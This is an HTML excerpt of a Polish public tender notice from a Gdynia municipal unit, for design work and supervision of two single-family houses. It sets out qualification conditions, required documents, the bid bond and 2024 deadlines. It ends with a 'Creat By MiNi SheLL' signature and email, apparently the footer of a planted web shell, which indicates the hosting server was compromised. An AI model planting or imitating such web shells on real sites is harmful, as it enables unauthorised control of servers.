class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 16.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>16.1.1. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie:<br/>1) art. 108 ust. 1 pkt 1-6 uPzp,<br/>2) art. 109. ust. 1 pkt 7 uPzp: z postępowania o udzielenie zamówienia publicznego wyklucza się Wykonawcę, który, z<br/>przyczyn leżących po jego stronie, w znacznym stopniu lub zakresie nie wykonał lub nienależycie wykonał albo długotrwale<br/>nienależycie wykonywał istotne zobowiązanie wynikające z wcześniejszej umowy w sprawie zamówienia publicznego lub<br/>umowy koncesji, co doprowadziło do wypowiedzenia lub odstąpienia od umowy, odszkodowania, wykonania zastępczego<br/>lub realizacji uprawnień z tytułu rękojmi za wady,<br/>3) art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz<br/>służących ochronie bezpieczeństwa narodowego (t.j. Dz. U. z 2023 r. poz. 1497 z późn. zm., dalej ustawa) z postępowania o<br/>udzielenie zamówienia publicznego prowadzonego na podstawie uPzp wyklucza się Wykonawcę:<br/>a) wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę<br/>na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>b) którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy<br/>oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593, z późn. zm.7) ) jest osoba wymieniona w wykazach określonych w<br/>rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>c) którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz.<br/>U. z 2023 r. poz. 120 i 295) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu<br/>269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę<br/>na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>16.1.2. spełniają warunki udziału w postępowaniu określone w art. 112 ust. 2 uPzp, tj.:<br/>16.1.2.1. w zakresie posiadania zdolności technicznej i zawodowej.<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że:<br/>a) w okresie ostatnich 6 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w<br/>tym okresie) wykonali co najmniej jeden projekt budowlany**, którego przedmiotem była budowa przynajmniej 1 budynku<br/>mieszkalnego lub użyteczności publicznej***:<br/> z instalacjami (przynajmniej ogrzewania i oświetlenia) opartymi o odnawialne źródła energii, lub/i<br/> pasywny, lub/i<br/> o niemal zerowym zużyciu energii, lub/i<br/> zero- lub/i plusenergetyczne.<br/>b) dysponują osobą, którą skierują do realizacji przedmiotowego zamówienia, z uprawnieniami do projektowania w<br/>specjalności architektonicznej bez ograniczeń*, która w okresie ostatnich 6 lat przed upływem terminu składania ofert (a<br/>jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) wykonała co najmniej jeden projekt budowlany** (tzn.<br/>była autorem lub współautorem projektu), którego przedmiotem była budowa przynajmniej 1 budynku mieszkalnego lub<br/>użyteczności publicznej***:<br/>- z instalacjami (przynajmniej ogrzewania i oświetlenia) opartymi o odnawialne źródła energii, lub/i<br/>- pasywny, lub/i<br/>- o niemal zerowym zużyciu energii, lub/i<br/>- zero- lub/i plusenergetyczne.<br/>Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia mogą spełnić powyżej wskazane warunki w<br/>sposób następujący – przynajmniej jeden z Wykonawców musi spełnić ten warunek.<br/>Użyte w niniejszej SWZ definicje należy rozumieć zgodnie z definicjami ustawy z dnia 7 lipca 1994 r. Prawo budowlane<br/>(Dz.U.2023.682 t.j. z dnia 2023.04.12).<br/>*Na podstawie art. 104 ustawy z dnia 7 lipca 1994r. Prawo budowlane, osoby, które, przed dniem wejścia w życie ustawy,<br/>uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych<br/>funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. Zakres<br/>uprawnień budowlanych należy odczytywać zgodnie z treścią decyzji o ich nadaniu w oparciu o przepisy będące podstawą<br/>ich nadania. Ponadto zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie,<br/>określone w art. 12 ust. 1, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na<br/>zasadach określonych w przepisach odrębnych, w szczególności uprawnienia uznane na podstawie ustawy z dnia 22<br/>grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej<br/>(Dz.U.2023.334 t.j. z dnia 2023.02.23).<br/>** Za wykonany projekt budowlany zostanie uznany projekt dla którego Wykonawca uzyskał od Zamawiającego (inwestora)<br/>Protokół odbioru lub inny równoważny dokument potwierdzający jego wykonanie i odbiór.<br/>*** Za budynek użyteczności publicznej uznaje się budynek zgodnie z definicją zawartą w §3 pkt 6) Rozporządzenia Ministra<br/>Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich<br/>usytuowanie, tj.: budynek przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu<br/>religijnego, oświaty, szkolnictwa wyższego, nauki, wychowania, opieki zdrowotnej, społecznej lub socjalnej, obsługi<br/>bankowej, handlu, gastronomii, usług, w tym usług pocztowych lub telekomunikacyjnych, turystyki, sportu, obsługi<br/>pasażerów w transporcie kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym, oraz inny budynek<br/>przeznaczony do wykonywania podobnych funkcji; za budynek użyteczności publicznej uznaje się także budynek biurowy<br/>lub socjalny <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">14.12. Dokumenty i<br/>oświadczenia składane wraz z ofertą:<br/>14.12.2. Oświadczenie o niepodleganiu wykluczeniu o treści zgodnej z załącznikiem nr 2 do SWZ, w zakresie wskazanym w: pkt<br/>16.1.1. SWZ .<br/>Oświadczenie składają odrębnie:<br/>a) Wykonawca/każdy spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku Oświadczenie<br/>potwierdza brak podstaw wykluczenia Wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z<br/>Wykonawców wykazuje spełnianie warunków udziału w postępowaniu,<br/>b) podmiot, na którego potencjał powołuje się Wykonawca celem potwierdzenia spełnienia warunków udziału w postępowaniu. W<br/>takim przypadku Oświadczenie potwierdza brak podstaw wykluczenia podmiotu oraz spełnianie warunków udziału w postępowaniu<br/>w zakresie, w jakim podmiot udostępnia swoje zasoby Wykonawcy<br/>17.1. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie<br/>krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień składania tj.:<br/>17.1.1. Oświadczenie Wykonawcy o aktualności informacji zawartych w Oświadczeniu, o którym mowa w art. 125 ust. 1 uPzp, w<br/>zakresie braku podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, zgodnie ze wzorem Oświadczenia<br/>stanowiącym załącznik nr 5 do SWZ.<br/>17.1.2. Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej oraz w przypadku przynależności do tej samej grupy kapitałowej, dowody potwierdzające, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w<br/>postępowaniu. Wzór oświadczenia stanowi załącznik nr 6 do SWZ,<br/>17.2. Zamawiający wymaga, aby w sytuacji, gdy oferta Wykonawcy, który wykazując się spełnieniem warunków udziału w<br/>postępowaniu polegał na zasobach innych podmiotów na zasadach określonych w art. 118 ust. 1 ustawy Pzp, została uznana za<br/>najkorzystniejszą, Wykonawca przedstawił w odniesieniu do tych podmiotów dokumenty wymienione w pkt 17.1.1., potwierdzające<br/>brak podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">14.12.<br/>Dokumenty i oświadczenia składane wraz z ofertą:<br/>Oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie wskazanym w pkt 16.1.2. o treści zgodnej z załącznikiem<br/>nr 2 do SWZ,<br/>Oświadczenie składają odrębnie:<br/>a) Wykonawca/każdy spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku Oświadczenie<br/>potwierdza brak podstaw wykluczenia Wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z<br/>Wykonawców wykazuje spełnianie warunków udziału w postępowaniu,<br/>b) podmiot, na którego potencjał powołuje się Wykonawca celem potwierdzenia spełnienia warunków udziału w postępowaniu. W<br/>takim przypadku Oświadczenie potwierdza brak podstaw wykluczenia podmiotu oraz spełnianie warunków udziału w postępowaniu<br/>w zakresie, w jakim podmiot udostępnia swoje zasoby Wykonawcy,<br/>14.12.3. Oświadczenie Wykonawców wspólnie ubiegający się o udzielenie zamówienia, z którego wynika, które roboty budowlane,<br/>dostawy lub usługi wykonają poszczególni Wykonawcy, zgodnie z pkt 16.5. SWZ, którego wzór stanowi załącznik nr 3 do SWZ,<br/>14.12.4. Dokument potwierdzający udostępnienie Wykonawcy zasobów przez inny podmiot na zasadach określonych w art. 118<br/>ustawy Pzp, jeżeli Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu polega na zdolnościach innych<br/>podmiotów, o których mowa w pkt 16.2. SWZ. Zamawiający wymaga złożenia wraz z ofertą zobowiązania, którego wzór stanowi<br/>załącznik nr 4 do SWZ.<br/>17.1. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie<br/>krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień składania tj.:<br/>17.1.3. Wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie<br/>ostatnich 6 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem przedmiotu, dat wykonania i<br/>podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi<br/>zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są<br/>wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie<br/>wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty<br/>potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. Wzór Wykazu usług stanowi<br/>załącznik nr 7 do SWZ.<br/>17.1.4. Wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez<br/>nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>Wśród osób, wykazanych przez Wykonawcę, musi się znaleźć osoba na potwierdzenie warunku, o którym mowa w pkt 16.1.2.1.b)<br/>SWZ. Wzór Wykazu osób stanowi załącznik nr 10 do SWZ.<br/>17.3. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli<br/>Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/>17.4.Dokumenty/oświadczenia załączone do oferty oraz złożone przez Wykonawcę na wezwanie Zamawiającego muszą być<br/>złożone zgodnie z wymaganiami określonymi przepisami uPzp, rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia<br/>23.12.2020 r. oraz rozporządzenia Prezesa Rady Ministrów z dnia 30 .12.2020 r.<br/>17.5.Dokumenty sporządzone w języku obcym muszą być składane wraz z tłumaczeniem na język polski.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 9.1. Zamawiający żąda od Wykonawców wniesienia wadium w wysokości 2 000,00 zł (słownie: dwa tysiące złotych).<br/>9.2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania<br/>ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 uPzp.<br/>9.3. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>9.3.1. pieniądzu;<br/>9.3.2. gwarancjach bankowych;<br/>9.3.3. gwarancjach ubezpieczeniowych;<br/>9.3.4. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U.2023.462 t.j. z dnia 2023.03.10).<br/>9.4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Laboratorium Innowacji Społecznych<br/>w banku PKO BP S.A. numer rachunku 84 1020 1811 0000 0102 0309 7094 z podaniem tytułu: „Opracowanie dokumentacji i pełnienie nadzoru autorskiego dla inwestycji Budowa 2 domów jednorodzinnych wraz z infrastrukturą i zagospodarowaniem terenu w Gdyni, przy ul. Rybaków” z opcją. Będzie ono przechowywane na rachunku bankowym Zamawiającego.<br/>9.5. Za wniesienie wadium w terminie, w formie pieniężnej, Zamawiający uważa wadium, które znajdzie się na rachunku<br/>Zamawiającego przed upływem terminu składania ofert.<br/>9.6. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt. 9.3.2-9.3.4:<br/>- musi wskazywać jako beneficjenta Laboratorium Innowacji Społecznych jednostkę budżetową Gminy Miasta Gdyni.<br/>- musi nieodwołalnie i bezwarunkowo zobowiązywać poręczyciela lub gwaranta do zapłaty kwoty pieniężnej na pierwsze<br/>wezwanie Zamawiającego, w wysokości odpowiadającej kwocie wadium.<br/>- należy złożyć w oryginale wraz z ofertą w postaci elektronicznej podpisanego kwalifikowanym podpisem elektronicznym<br/>przez wystawcę (np. bank, ubezpieczyciela).<br/>9.7. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 uPzp), Zamawiający wymaga<br/>aby poręczenie lub gwarancja obejmowała swą treścią wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia (tj. zobowiązanych z tytułu poręczenia lub gwarancji) lub aby z jej treści wynikało, że zabezpiecza ofertę<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum).<br/>9.8. Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 uPzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 14.12.5. Pełnomocnictwo, w przypadku gdy formularz oferty lub załączone do niego dokumenty są podpisane przez osobę,<br/>której umocowanie do reprezentowania Wykonawcy nie wynika z innych dokumentów załączonych do oferty lub ofertę<br/>składają podmioty wspólnie ubiegające się o udzielenie zamówienia.<br/>Pełnomocnictwo powinno zostać złożone w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub<br/>podpisem zaufanym lub podpisem osobistym.<br/>Dopuszcza się również przedłożenie elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem przez<br/>notariusza, tj. podpisanej kwalifikowanym podpisem elektronicznym osoby posiadającej uprawnienia notariusza. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Strony dopuszczają możliwość dokonywania zmian umowy w okolicznościach przewidzianych ustawą Pzp a także zmian przewidzianych w Projektowanych postanowieniach umowy - stanowiących załącznik nr 8 do SWZ. Zmiany umowy mogą dotyczyć między innymi terminu realizacji, wynagrodzenia, zakresu przedmiotu zamówienia, podwykonawców, osób realizujących umowę. Wszelkie zmiany, z zastrzeżeniem zapisów Umowy, jakie Strony chciałyby wprowadzić do ustaleń wynikających z zawieranej Umowy wymagają wcześniejszego uzgodnienia z Zamawiającym oraz zawarcia aneksu do Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-09 12:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pomocą platformy eZamawiający: https://lisgdynia.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-09 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 14.12. Dokumenty i oświadczenia składane wraz z ofertą:<br/>14.12.1. Formularz oferty o treści zgodnej z załącznikiem nr 1 do SWZ,<br/>14.12.2. Oświadczenie o niepodleganiu wykluczeniu o treści zgodnej z załącznikiem nr 2 do SWZ, w zakresie wskazanym w: pkt 16.1.1. SWZ oraz Oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie wskazanym w pkt 16.1.2. o treści zgodnej z załącznikiem nr 2 do SWZ,<br/>Oświadczenie składają odrębnie:<br/>a) Wykonawca/każdy spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku<br/>Oświadczenie potwierdza brak podstaw wykluczenia Wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu,<br/>b) podmiot, na którego potencjał powołuje się Wykonawca celem potwierdzenia spełnienia warunków udziału w postępowaniu. W takim przypadku Oświadczenie potwierdza brak podstaw wykluczenia podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim podmiot udostępnia swoje zasoby Wykonawcy,<br/>14.12.3. Oświadczenie Wykonawców wspólnie ubiegający się o udzielenie zamówienia, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy, zgodnie z pkt 16.5. SWZ, którego wzór stanowi załącznik nr 3 do SWZ,<br/>14.12.4. Dokument potwierdzający udostępnienie Wykonawcy zasobów przez inny podmiot na zasadach określonych w art. 118 ustawy Pzp, jeżeli Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu polega na zdolnościach innych podmiotów, o których mowa w pkt 16.2. SWZ. Zamawiający wymaga złożenia wraz z ofertą zobowiązania, którego wzór stanowi załącznik nr 4 do SWZ,<br/>14.12.5. Pełnomocnictwo, w przypadku gdy formularz oferty lub załączone do niego dokumenty są podpisane przez osobę, której umocowanie do reprezentowania Wykonawcy nie wynika z innych dokumentów załączonych do oferty lub ofertę składają podmioty wspólnie ubiegające się o udzielenie zamówienia.<br/>Pełnomocnictwo powinno zostać złożone w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym.<br/>Dopuszcza się również przedłożenie elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem przez notariusza, tj. podpisanej kwalifikowanym podpisem elektronicznym osoby posiadającej uprawnienia notariusza.<br/>14.12.6. Dowód wniesienia wadium – oryginał, jeżeli wadium wnoszone jest w innej formie niż pieniądz, z uwzględnieniem postanowień Rozdziału 9.<br/>21.1. Wykonawca przed podpisaniem umowy zobowiązany jest do wniesienia zabezpieczenia należytego wykonania umowy w wysokości 5 % ceny całkowitej brutto podanej w ofercie

Creat By MiNi SheLL
Email: jattceo@gmail.com